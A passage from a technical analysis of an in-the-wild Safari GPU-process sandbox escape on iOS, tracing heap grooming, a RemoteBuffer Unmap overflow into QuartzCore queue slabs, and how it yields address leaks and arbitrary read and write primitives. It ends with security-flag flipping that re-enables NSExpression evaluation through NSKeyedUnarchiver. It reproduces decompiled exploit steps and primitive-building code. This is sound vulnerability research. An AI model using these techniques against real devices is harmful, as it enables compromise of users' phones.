It should be noted that security issues with WebGPU are well-known and the javascript interface to WebGPU is disabled in Safari on iOS. But the IPC's which support that javascript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.

Destination unknown?

Finding the allocation site for the GPU buffer wasn't trivial; the allocation site for the buffer was hard to determine statically, which made it hard to get a picture of what objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.

Statically following the implementation of the  RemoteRenderingBackend::CreateImageBuffer IPC, which, based on the high-level flow of the exploit, appeared like it must be responsible for allocating the overflow target again quickly ended up in system library code with no obvious targets.

Working with the theory that because of the simplicity of the heap groom it was likely that vm_allocate/mmap was somehow responsible for the allocations I set breakpoints on those APIs on an M1 mac in the Safari GPU process and ran the WebGL conformance tests. There was only a single place where mmap was called:

Target 0: (com.apple.WebKit.GPU) stopped.

(lldb) bt

* thread #30, name = 'RemoteRenderingBackend work queue',

  stop reason = breakpoint 12.1

* frame #0: mmap

  frame #1: QuartzCore`CA::CG::Queue::allocate_slab

  frame #2: QuartzCore`CA::CG::Queue::alloc

  frame #3: QuartzCore`CA::CG::ContextDelegate::fill_rects

  frame #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_

  frame #5: CoreGraphics`CGContextFillRects

  frame #6: CoreGraphics`CGContextFillRect

  frame #7: CoreGraphics`CGContextClearRect

  frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create

  frame #9: WebKit::RemoteRenderingBackend::createImageBuffer

This corresponds perfectly with the IPC we see called in the heap groom above!

To the core...

QuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site it seems to be a custom queue type used for drawing commands. Dumping the mmap'ed QueueSlab memory a little later on we see some structure:

(lldb) x/10xg $x0

0x13574c000: 0x00000001420041d0 0x0000000000000000

0x13574c010: 0x0000000000004000 0x0000000000003f10

0x13574c020: 0x000000013574c0f0 0x0000000000000000

Reversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:

struct QuartzQueueSlab

{

  struct QuartzQueueSlab *free_list_ptr;

  uint64_t size_a;

  uint64_t mmap_size;

  uint64_t remaining_size;

  uint64_t buffer_ptr;

  uint64_t f;

  uint8_t inline_buffer[16336];

};

It's a short header with a free-list pointer, some sizes then a pointer into an inline buffer. The fields are initialized like this:

mapped_base->free_list_ptr = 0;

mapped_base->size_a = 0;

mapped_base->mmap_size = mmap_size;

mapped_base->remaining_size = mmap_size - 0x30;

mapped_base->buffer_ptr = mapped_base->inline_buffer;

Diagram showing the state of a fresh QueueSlab, with the end pointer pointing to the start of the inline buffer.

The QueueSlab is a simple allocator. end starts off pointing to the start of the inline buffer; getting bumped up each allocation as long as remaining indicates there's still space available:

Diagram showing the end pointer moving forwards within the allocated slab buffer

Assuming that this very likely is the corruption target; the bytes which the call to RemoteBuffer::Unmap would corrupt this header with line up like this:

Diagram showing the QueueSlab fields corrupted by the primitive and have the arg value replaces the end inline buffer pointer

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

The exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which would like up perfectly with the inline-buffer pointer of the QueueSlab, replacing it with an arbitrary value.

The queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.

Groom 2

Before triggering the Unmap overflow there's another groom:

remote_device_after_base_id = rand();

for (j = 0; j < 200; j++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + j);

}

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

IPC_RemoteRenderingBackend_CacheNativeImage(

  image_buffer_base_id + 34LL);

semaphore_signal(semaphore_b);

semaphore_signal(semaphore_a);

for (k = 0; k < 200; k++) {

  IPC_RemoteDevice_CreateBuffer_16k(

    remote_device_after_base_id + 200 + k);

}

This is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer which is the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.

Overflow 1

The core primitive for the first overflow involves 4 IPC methods:

  1. RemoteBuffer::MapAsync - sets up the destination pointer for the overflow
  2. RemoteBufferUnmap - performs the overflow, corrupting queue metadata
  3. RemoteDisplayListRecorder::DrawNativeImage - uses the corrupted queue metadata to write a pointer to a controlled address
  4. RemoteCDMFactoryProxy::CreateCDM - discloses the written pointer pointer value

We'll look at each of those in turn:

IPC 1 - MapAsync

for (m = 0; m < 6; m++) {

  index_of_corruptor = m;

  IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                            0x4000LL,

                            0LL);

Diagram showing the relationship between RemoteBuffer objects, their backing buffers and the QueueSlab pages. The backing buffers and QueueSlab pages alternate

They iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation. This MapAsync IPC sets the RemoteBuffer's m_mappedRange->source field to point at the very end (hopefully at a QueueSlab.)

IPC 2 - Unmap

  wrap_remote_buffer_unmap(remote_device_buffer_id_base + m,

WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88)

wrap_remote_buffer_unmap is the wrapper function we've seen snippets of before which calls the Unmap IPC:

void* wrap_remote_buffer_unmap(int64 dst, int64 arg)

{

  int64 b[5];

  b[0] = 0x7F6F3229LL;

  b[1] = 0LL;

  b[2] = 0LL;

  b[3] = 0xFFFFLL;

  b[4] = arg;

  return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

}

The arg value passed to wrap_remote_buffer_unmap (which is the base target address for the overwrite in the next step) is (WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88), a symbol which was linked by the JS find-and-replace on the Mach-O, it points to the global variable used here:

int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()

{

  return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;

}

As the name suggests, this is used to generate unique ids using a monotonically-increasing counter (there is a level of locking above this function.) The value passed in the Unmap IPC points 0x88 below the address of ::current.

Diagram showing the corruption primitive being used to move the end pointer out of the allocated buffer to 0x88 bytes below the target

If the groom works, this has the effect of corrupting a QueueSlab's inline buffer pointer with a pointer to 0x88 bytes below the counter used by the GPU process to allocate new identifiers.

IPC 3 - DrawNativeImage

for ( n = 0; n < 0x22; ++n )  {

  if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {

    continue

  }

  IPC_RemoteDisplayListRecorder_DrawNativeImage(

    image_buffer_base_id + n,// potentially corrupted target

    image_buffer_base_id + 34LL);

The exploit then iterates through all the ImageBuffer objects (skipping those which were released to make gaps for the RemoteBuffers) and passes each in turn as the first argument to IPC_RemoteDisplayListRecorder_DrawNativeImage. The hope is that one of them had their associated QueueSlab structure corrupted. The second argument passed to DrawNativeImage is the ImageBuffer which had CacheNativeImage called on it earlier.

Let's follow the implementation of DrawNativeImage on the GPU process side to see what happens with the corrupted QueueSlab associated with that first ImageBuffer:

void RemoteDisplayListRecorder::drawNativeImage(

  RenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  drawNativeImageWithQualifiedIdentifier(

    {imageIdentifier, m_webProcessIdentifier},

    imageSize,

    destRect,

    srcRect,

    options);

}

This immediately calls through to:

void

RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(

  QualifiedRenderingResourceIdentifier imageIdentifier,

  const FloatSize& imageSize,

  const FloatRect& destRect,

  const FloatRect& srcRect,

  const ImagePaintingOptions& options)

{

  RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);

  if (!image) {

    ASSERT_NOT_REACHED();

    return;

  }

  handleItem(DisplayList::DrawNativeImage(

               imageIdentifier.object(),

               imageSize,

               destRect,

               srcRect,

               options),

             *image);

}

imageIdentifier here corresponds to the ID of the ImageBuffer which was passed to CacheNativeImage earlier. Looking briefly at the implementation of CacheNativeImage we can see that it allocates a NativeImage object (which is what ends up being returned by the call to cachedNativeImage above):

void

RemoteRenderingBackend::cacheNativeImage(

  const ShareableBitmap::Handle& handle,

  RenderingResourceIdentifier nativeImageResourceIdentifier)

{

  cacheNativeImageWithQualifiedIdentifier(

    handle,

    {nativeImageResourceIdentifier,

      m_gpuConnectionToWebProcess->webProcessIdentifier()}

  );

}

void

RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(

  const ShareableBitmap::Handle& handle,

  QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)

{

  auto bitmap = ShareableBitmap::create(handle);

  if (!bitmap)

    return;

  auto image = NativeImage::create(

                 bitmap->createPlatformImage(

                   DontCopyBackingStore,

                   ShouldInterpolate::Yes),

                 nativeImageResourceIdentifier.object());

  if (!image)

    return;

  m_remoteResourceCache.cacheNativeImage(

    image.releaseNonNull(),

    nativeImageResourceIdentifier);

}

This NativeImage object is allocated by the default system malloc.

Returning to the DrawNativeImage flow we reach this:

void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const

{

    context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);

}

The context object is a GraphicsContextCG, a wrapper around a system CoreGraphics CGContext object:

void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)

This ends up calling:

CGContextDrawImage(context, adjustedDestRect, subImage.get());

Which calls CGContextDrawImageWithOptions.

Through a few more levels of indirection in the CoreGraphics library this eventually reaches:

int64 CA::CG::ContextDelegate::draw_image_(

  int64 delegate,

  int64 a2,

  int64 a3,

  CGImage *image...) {

...

  alloc_from_slab = CA::CG::Queue::alloc(queue, 160);

  if (alloc_from_slab)

   CA::CG::DrawImage::DrawImage(

     alloc_from_slab,

     Info_2,

     a2,

     a3,

     FillColor_2,

     &v18,

     AlternateImage_0);

Via the delegate object the code retrieves the CGContext and from there the Queue with the corrupted QueueSlab. They then make a 160 byte allocation from the corrupted queue slab.

void*

CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)

{

  uint64_t buffer*;

...

  size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;

  current_slab = q->current_slab;

  if ( !current_slab )

    goto alloc_slab;

  if ( !q->c || current_slab->remaining_size >= size_rounded )

    goto GOT_ENOUGH_SPACE;

...

GOT_ENOUGH_SPACE:

    remaining_size = current_slab->remaining_size;

    new_remaining = remaining_size - size_requested_rounded;

    if ( remaining_size >= size_requested_rounded )

    {

      buffer = current_slab->end;

      current_slab->remaining_size = new_remaining;

      current_slab->end = buffer + size_rounded;

      goto RETURN_ALLOC;

...

RETURN_ALLOC:

  buffer[0] = size_rounded;

  atomic_fetch_add(q->alloc_meta);

  buffer[1] = q->alloc_meta

...

  return &buffer[2];

}

When CA::CG::Queue::alloc attempts to allocate from the corrupted QueueSlab, it sees that the slab claims to have 0xffff bytes of free space remaining so proceeds to write a 0x10 byte header into the buffer by following the end pointer, then returns that end pointer plus 0x10. This has the effect of returning a value which points 0x78 bytes below the WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current global.

draw_image_ then passes this allocation as the first argument to CA::CG::DrawImage::DrawImage (with the cachedImage pointer as the final argument.)

int64 CA::CG::DrawImage::DrawImage(

  int64 slab_buf,

  int64 a2,

  int64 a3,

  int64 a4,

  int64 a5,

  OWORD *a6,

  CGImage *img)

{

...

(slab_buf + 0x78) = CGImageRetain(img);

DrawImage writes the pointer to the cachedImage object to +0x78 in the fake slab allocation, which happens now to exactly overlap WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current. This has the effect of replacing the current value of the ::current monotonic counter with the address of the cached NativeImage object.

IPC 4 - CreateCDM

The final step in this section is to then call any IPC which causes the GPU process to allocate a new identifier using generateIdentifierInternal:

interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();

If the new identifier is greater than 0x10000 they mask off the lower 4 bits and have successfully disclosed the remote address of the cached NativeImage object.

Over and over - arbitrary read

The next stage is to build an arbitrary read primitive, this time using 5 IPCs:

  1. MapAsync - sets up the destination pointer for the overflow
  2. Unmap - performs the overflow, corrupting queue metadata
  3. SetCTM - sets up parameters
  4. FillRect - writes the parameters through a controlled pointer
  5. CreateRecorder - returns data read from an arbitrary address

Arbitrary read IPC 1 & 2: MapAsync/Unmap

MapAsync and Unmap are used to again corrupt the same QueueSlab object, but this time the queue slab buffer pointer is corrupted to point 0x18 bytes below the following symbol:

WebCore::MediaRecorderPrivateWriter::mimeType(void)const::$_11::operator() const(void)::impl

Specifically, that symbol is the constant StringImpl object for the "audio/mp4" string returned by reference from this function:

const String&

MediaRecorderPrivateWriter::mimeType() const {

  static NeverDestroyed<const String>

    audioMP4(MAKE_STATIC_STRING_IMPL("audio/mp4"));

  static NeverDestroyed<const String>

    videoMP4(MAKE_STATIC_STRING_IMPL("video/mp4"));

  return m_hasVideo ? videoMP4 : audioMP4;

}

Concretely this is a StringImplShape object with this layout:

class STRING_IMPL_ALIGNMENT StringImplShape {

    unsigned m_refCount;

    unsigned m_length;

    union {

        const LChar* m_data8;

        const UChar* m_data16;

        const char* m_data8Char;

        const char16_t* m_data16Char;

    };

    mutable unsigned m_hashAndFlags;

};

Arbitrary read IPC 3: SetCTM

The next IPC is RemoteDisplayListRecorder::SetCTM:

messages -> RemoteDisplayListRecorder NotRefCounted Stream {

...

    SetCTM(WebCore::AffineTransform ctm) StreamBatched

...

CTM is the "Current Transform Matrix" and the WebCore::AffineTransform object passed as the argument is a simple struct with 6 double values defining an affine transformation.

The exploit IPC wrapper function takes two arguments in addition to the image buffer id, and from the surrounding context it's clear that they must be a length and pointer for the arbitrary read:

IPC_RemoteDisplayListRecorder_SetCTM(

  candidate_corrupted_target_image_buffer_id,

  (read_this_much << 32) | 0x100,

  read_from_here);

The wrapper passes those two 64-bit values as the first two "doubles" in the IPC. On the receiver side the implementation doesn't do much apart from directly store those affine transform parameters into the CGContext's CGState object:

void

setCTM(const WebCore::AffineTransform& transform) final

{

  GraphicsContextCG::setCTM(

    m_inverseImmutableBaseTransform * transform);

}

void

GraphicsContextCG::setCTM(const AffineTransform& transform)

{

  CGContextSetCTM(platformContext(), transform);

  m_data->setCTM(transform);

  m_data->m_userToDeviceTransformKnownToBeIdentity = false;

}

Reversing CGContextSetCTM we see that the transform is just stored into a 0x30 byte field at offset +0x18 in the CGContext's CGGState object (at +0x60 in the CGContext):

188B55CD4  EXPORT _CGContextSetCTM                      

188B55CD4  MOV   X8, X0

188B55CD8  CBZ   X0, loc_188B55D0C

188B55CDC  LDR   W9, [X8,#0x10]

188B55CE0  MOV   W10, #'CTXT'

188B55CE8  CMP   W9, W10

188B55CEC  B.NE  loc_188B55D0C

188B55CF0  LDR   X8, [X8,#0x60]

188B55CF4  LDP   Q0, Q1, [X1]

188B55CF8  LDR   Q2, [X1,#0x20]

188B55CFC  STUR  Q2, [X8,#0x38]

188B55D00  STUR  Q1, [X8,#0x28]

188B55D04  STUR  Q0, [X8,#0x18]

188B55D08  RET

Arbitrary read IPC 4: FillRect

This IPC takes a similar path to the DrawNativeImage IPC discussed earlier. It allocates a new buffer from the corrupted QueueSlab with the value returned by CA::CG::Queue::alloc this time now pointing 8 bytes below the "audio/mp4" StringImpl. FillRect eventually reaches this code

CA::CG::DrawOp::DrawOp(slab_ptr, a1, a3, CGGState, a5, v24);

...

  CTM_2 = (_OWORD *)CGGStateGetCTM_2(CGGGState);

  v13 = CTM_2[1];

  v12 = CTM_2[2];

  *(_OWORD *)(slab_ptr + 8) = *CTM_2;

  *(_OWORD *)(slab_ptr + 0x18) = v13;

  *(_OWORD *)(slab_ptr + 0x28) = v12;

…which just directly copies the 6 CTM doubles to offset +8 in the allocation returned by the corrupted QueueSlab, which overlaps completely with the StringImpl, corrupting the string length and buffer pointer.

Arbitrary read IPC 5: CreateRecorder

messages -> RemoteMediaRecorderManager NotRefCounted {

  CreateRecorder(

    WebKit::MediaRecorderIdentifier id,

    bool hasAudio,

    bool hasVideo,

    struct WebCore::MediaRecorderPrivateOptions options)

      ->

    ( std::optional<WebCore::ExceptionData> creationError,

      String mimeType,

      unsigned audioBitRate,

      unsigned videoBitRate)

  ReleaseRecorder(WebKit::MediaRecorderIdentifier id)

}

The CreateRecorder IPC returns, among other things, the contents of the mimeType String which FillRect corrupted to point to an arbitrary location, yielding the arbitrary read primitive.

What to read?

Recall that the cacheNativeImage operation was sandwiched between the allocation of 400 RemoteBuffer objects via the RemoteDevice::CreateBuffer IPC.

Note that earlier (for the MapAsync/Unmap corruption)  it was the backing buffer pages of the RemoteBuffer which were the groom target - that's not the case for the memory disclosure. The target is instead the AGXG15FamilyBuffer object which is the wrapper object which points to those backing pages. These are also allocated by during the RemoteDevice::CreateBuffer IPC calls. Crucially, these wrapper objects are allocated by the default malloc implementation, which is malloc_zone_malloc using the default ("scalable") zone. @elvanderb covered the operation of this heap allocator in their "Heapple Pie" presentation. Provided that the targeted allocation size's freelist is empty this zone will allocate upwards, making it likely that the NativeImage and AGXG15FamilyBuffer objects will be near each other in virtual memory.

They use the arbitrary read primitive to read 3 pages of data from the GPU process, starting from the address of the cached NativeImage  and they search for a pointer to the AGXG15FamilyBuffer Objective-C isa pointer (masking out any PAC bits):

for ( ii = 0; ii < 0x1800; ++ii ) {

  if ( ((leaker_buffer_contents[ii] >> 8) & 0xFFFFFFFF0LL) ==

    (AGXMetalG15::_OBJC_CLASS___AGXG15FamilyBuffer & 0xFFFFFFFF0LL) )

...

What to write?

If the search is successful they now know the absolute address of one of the AGXG15FamilyBuffer objects - but at this point they don't know which of the RemoteBuffer objects it corresponds to..

They use the same Map/Unmap/SetCTM/FillRect IPCs as in the setup for the arbitrary read to write the address of WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current (the monotonic unique id counter seen earlier) into the field at +0x98 of the AGXG15FamilyBuffer.

Looking at the class hierarchy of AGXG15FamilyBuffer (AGXG15FamilyBuffer : AGXBuffer : IOGPUMetalBuffer : IOGPUMetalResource : _MTLResource : _MTLObjectWithLabel : NSObject) we find that +0x98 is the virtualAddress property of IOGPUMetalResource.

@interface IOGPUMetalResource : _MTLResource <MTLResourceSPI> {

        IOGPUMetalResource* _res;

        IOGPUMetalResource* next;

        IOGPUMetalResource* prev;

        unsigned long long uniqueId;

}

@property (readonly) _IOGPUResource* resourceRef;

@property (nonatomic,readonly) void* virtualAddress;

@property (nonatomic,readonly) unsigned long long gpuAddress;

@property (nonatomic,readonly) unsigned resourceID;

@property (nonatomic,readonly) unsigned long long resourceSize;

@property (readonly) unsigned long long cpuCacheMode;

I mentioned earlier that the destination pointer for the MapAsync/Unmap bad memcpy was calculated from a buffer property called contents, not virtualAddress:

  return static_cast<char*>(m_buffer.contents) + offset;

Dot syntax in Objective-C is syntactic sugar around calling an accessor method and the contents accessor directly calls the virtualAddress accessor, which returns the virtualAddress field:

void* -[IOGPUMetalBuffer contents]

  B               _objc_msgSend$virtualAddress_1

[IOGPUMetalResource virtualAddress]

ADRP   X8, #_OBJC_IVAR_$_IOGPUMetalResource._res@PAGE

LDRSW  X8, [X8,#_OBJC_IVAR_$_IOGPUMetalResource._res@PAGEOFF] ; 0x18

ADD    X8, X0, X8

LDR    X0, [X8,#0x80]

RET

They then loop through each of the candidate RemoteBuffer objects, mapping the beginning then unmapping with an 8 byte buffer, causing a write of a sentinel value through the potentially corrupted IOGPUMetalResource::virtualAddress field:

for ( jj = 200; jj < 400; ++jj )

{

  sentinel = 0x3A30DD9DLL;

  IPC_RemoteBuffer_MapAsync(remote_device_after_base_id + jj, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(remote_device_after_base_id + jj, &sentinel, 8LL);

  semaphore_signal(semaphore_a);

  CDM = IPC_RemoteCDMFactoryProxy_CreateCDM();

  if ( CDM >= 0x3A30DD9E && CDM <= 0x3A30DF65 ) {

    ...

After each write they request a new CDM and look to see whether they got a resource ID near the sentinel value they set - if so then they've found a RemoteBuffer whose virtual address they can completely control!

They store this id and use it to build their final arbitrary write primitive with 6 IPCs:

arbitrary_write(u64 ptr, u64 value_ptr, u64 size) {

  IPC_RemoteBuffer_MapAsync(

   remote_device_buffer_id_base + index_of_corruptor,

   0x4000LL, 0LL);

  wrap_remote_buffer_unmap(

    remote_device_buffer_id_base + index_of_corruptor,

    agxg15familybuffer_plus_0x80);

  IPC_RemoteDisplayListRecorder_SetCTM(

    candidate_corrupted_target_image_buffer_id,

    ptr,

    0LL);

  IPC_RemoteDisplayListRecorder_FillRect(

    candidate_corrupted_target_image_buffer_id);

  IPC_RemoteBuffer_MapAsync(

    device_id_with_corrupted_backing_buffer_ptr, 0LL, 0LL);

  IPC_RemoteBuffer_Unmap(

    device_id_with_corrupted_backing_buffer_ptr, value_ptr, size);

}

The first MapAsync/Unmap corrupt the original QueueSlab to point the buffer pointer to 0x18 bytes below the address of the virtualAddress field of an AGXG15FamilyBuffer.

SetCTM and FillRect then cause the arbitrary write target pointer value to be written through the corrupted QueueSlab allocation to replace the AGXG15FamilyBuffer's virtualAddress member.

The final MapAsync/Unmap pair then write through that corrupted virtualAddress field, yielding an arbitrary write primitive which won't corrupt any surrounding memory.

Mitigating mitigations

At this point the attackers have an arbitrary read/write primitive - it's surely game over. But never-the-less, the most fascinating parts of this exploit are still to come.

Remember, they are seeking not just to exploit this vulnerability; they are really seeking to minimize the overall cost of successfully exploiting as many full exploit chains as possible with the lowest marginal cost. This is typically done using custom frameworks which permit code-reuse across exploits. In this case the goal is to use some resources (IOKit userclients) which only the GPU Process has access to, but this is done in a very generic way using a custom framework requiring only a few arbitrary writes to kick off.


What's old is new again - NSArchiver

The FORCEDENTRY sandbox escape exploit which I wrote about last year used a logic flaw to enable the evaluation of an NSExpression across a sandbox boundary. If you're unfamiliar with NSExpression exploitation I'd recommend reading that post first.

As part of the fix for that issue Apple introduced various hardening measures intended to restrict both the computational power of NSExpressions as well as the particular avenue used to cause the evaluation of an NSExpression during object deserialization.

The functionality was never actually removed though. Instead, it was deprecated and gated behind various flags. This likely did lock down the attack surface from certain perspectives; but with a sufficiently powerful initial primitive (like an arbitrary read/write) those flags can simply be flipped and the full power of NSExpression-based scripting can be regained. And that's exactly what this exploit continues on to do...

Flipping bits

Using the arbitrary read/write they flip the globals used in places like __NSCoderEnforceFirstPartySecurityRules to disable various security checks.

They also swap around the implementation class of NSSharedKeySet to be PrototypeTools::_OBJC_CLASS___PTModule and swap the NSKeyPathSpecifierExpression and NSFunctionExpression classRefs to point to each other.

Forcing Entry

We've seen throughout this writeup that Safari has its own IPC mechanism with custom serialization - it's not using XPC or MIG or protobuf or Mojo or any of the dozens of other serialization options. But is it the case that everything gets serialized with their custom code?

As we observed in the ForcedEntry writeup, it's often just one tiny, innocuous line of code which ends up opening up an enormous extra attack surface. In ForcedEntry it was a seemingly simple attempt to edit the loop count of a GIF. Here, there's another simple piece of code which opens up a potentially unexpected huge extra attack surface: NSKeyedArchiver. It turns out, you can get NSKeyedArchiver objects serialized and deserialized across a Safari IPC boundary, specifically using this IPC:

  RedirectReceived(

    WebKit::RemoteMediaResourceIdentifier identifier,

    WebCore::ResourceRequest request,

    WebCore::ResourceResponse response)

  ->

    (WebCore::ResourceRequest returnRequest)

This IPC takes two arguments:

WebCore::ResourceRequest request

WebCore::ResourceResponse response

Let's look at the ResourceRequest deserialization code:

bool

ArgumentCoder<ResourceRequest>::decode(

  Decoder& decoder,

  ResourceRequest& resourceRequest)

{

  bool hasPlatformData;

  if (!decoder.decode(hasPlatformData))

    return false;

  bool decodeSuccess =

    hasPlatformData ?

      decodePlatformData(decoder, resourceRequest)

    :

      resourceRequest.decodeWithoutPlatformData(decoder);

That in turn calls:

bool

ArgumentCoder<WebCore::ResourceRequest>::decodePlatformData(

  Decoder& decoder,

  WebCore::ResourceRequest& resourceRequest)

{

  bool requestIsPresent;

  if (!decoder.decode(requestIsPresent))

     return false;

  if (!requestIsPresent) {

    resourceRequest = WebCore::ResourceRequest();

    return true;

  }

  auto request = IPC::decode<NSURLRequest>(

                   decoder, NSURLRequest.class);

That last line decoding request looks slightly different to the others - rather than calling  decoder.decoder() passing the field to decode by reference they're explicitly typing the field here in the template invocation, which takes a different decoder path:

​​template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, Class allowedClass)

{

    return decode<T>(decoder, allowedClass ?

                              @[ allowedClass ] : @[ ]);

}

(note the @[] syntax defines an Objective-C array literal so this is creating an array with a single entry)

This then calls:

template<typename T, typename>

std::optional<RetainPtr<T>> decode(

  Decoder& decoder, NSArray<Class> *allowedClasses)

{

  auto result = decodeObject(decoder, allowedClasses);

  if (!result)

    return std::nullopt;

  ASSERT(!*result ||

         isObjectClassAllowed((*result).get(), allowedClasses));

  return { *result };

}

This continues on to a different argument decoder implementation than the one we've seen so far:

std::optional<RetainPtr<id>>

decodeObject(

  Decoder& decoder,

  NSArray<Class> *allowedClasses)

{

  bool isNull;

  if (!decoder.decode(isNull))

    return std::nullopt;

  if (isNull)

    return { nullptr };

  NSType type;

  if (!decoder.decode(type))

    return std::nullopt;

In this case, rather than knowing the type to decode upfront they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:

switch (type) {

  case NSType::Array:

    return decodeArrayInternal(decoder, allowedClasses);

  case NSType::Color:

    return decodeColorInternal(decoder);

  case NSType::Dictionary:

    return decodeDictionaryInternal(decoder, allowedClasses);

  case NSType::Font:

    return decodeFontInternal(decoder);

  case NSType::Number:

    return decodeNumberInternal(decoder);

  case NSType::SecureCoding:

    return decodeSecureCodingInternal(decoder, allowedClasses);

  case NSType::String:

    return decodeStringInternal(decoder);

  case NSType::Date:

    return decodeDateInternal(decoder);

  case NSType::Data:

    return decodeDataInternal(decoder);

  case NSType::URL:

    return decodeURLInternal(decoder);

  case NSType::CF:

    return decodeCFInternal(decoder);

  case NSType::Unknown:

    break;

}


In this case they choose type
7, which corresponds to NSType::SecureCoding, decoded by calling decodeSecureCodingInternal which allocates an NSKeyedUnarchiver initialized with data from the IPC message:

auto unarchiver =

  adoptNS([[NSKeyedUnarchiver alloc]

           initForReadingFromData:

             bridge_cast(data.get()) error:nullptr]);

The code adds a few more classes to the allow-list to be decoded:

auto allowedClassSet =

  adoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);

[allowedClassSet addObject:WKSecureCodingURLWrapper.class];

[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];

if ([allowedClasses containsObject:NSAttributedString.class]) {

  [allowedClassSet

    unionSet:NSAttributedString.allowedSecureCodingClasses];

}

then unarchives the object:

id result =

  [unarchiver decodeObjectOfClasses:

                allowedClassSet.get()

              forKey:

                NSKeyedArchiveRootObjectKey];

The serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:

- (instancetype)initWithCoder:(NSCoder *)coder

{

  auto selfPtr = adoptNS([super initWithString:@""]);

  if (!selfPtr)

    return nil;

  BOOL hasBaseURL;

  [coder decodeValueOfObjCType:"c"

         at:&hasBaseURL

         size:sizeof(hasBaseURL)];

  RetainPtr<NSURL> baseURL;

  if (hasBaseURL)

    baseURL =

     (NSURL *)[coder decodeObjectOfClass:NSURL.class

                     forKey:baseURLKey];

...

}

This in turn decodes an NSURL, which decodes an NSString member named "NS.relative". The attacker object passes a subclass of NSString which is _NSLocalizedString which sets up the following allow-list:

  v10 = objc_opt_class_385(&OBJC_CLASS___NSDictionary);

  v11 = objc_opt_class_385(&OBJC_CLASS___NSArray);

  v12 = objc_opt_class_385(&OBJC_CLASS___NSNumber);

  v13 = objc_opt_class_385(&OBJC_CLASS___NSString);

  v14 = objc_opt_class_385(&OBJC_CLASS___NSDate);

  v15 = objc_opt_class_385(&OBJC_CLASS___NSData);

  v17 = objc_msgSend_setWithObjects__0(&OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);

  v20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR("NS.configDict"));

They then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):

-[NSSharedKeyDictionary initWithCoder:]

...

v6 = objc_opt_class_388(&OBJC_CLASS___NSSharedKeySet);

...

 v11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR("NS.skkeyset"));

NSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.

But recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! Which means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in ForcedEntry of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!


Part II - Data Is All You Need

NSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:

NSPredicateOperator_

NSRightExpression_

NSLeftExpression

NSComparisonPredicate[NSPredicate

^NSSelectorNameYNSOperand[NSArguments

NSFunctionExpression\NSExpression

NSConstantValue

NSConstantValueExpressionTself

\NSCollection

NSAggregateExpression

There are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:

syscallInvocation

manipulating locks:

os_unfair_unlock_0x34

%os_unfair_lock_0x34InvocationInstance

spinning up threads:

.detachNewThreadWithBlock:_NSFunctionExpression

detachNewThreadWithBlock:

!NSThread_detachNewThreadWithBlock

XNSThread

3NSThread_detachNewThreadWithBlockInvocationInstance

6NSThread_detachNewThreadWithBlockInvocationInstanceIMP

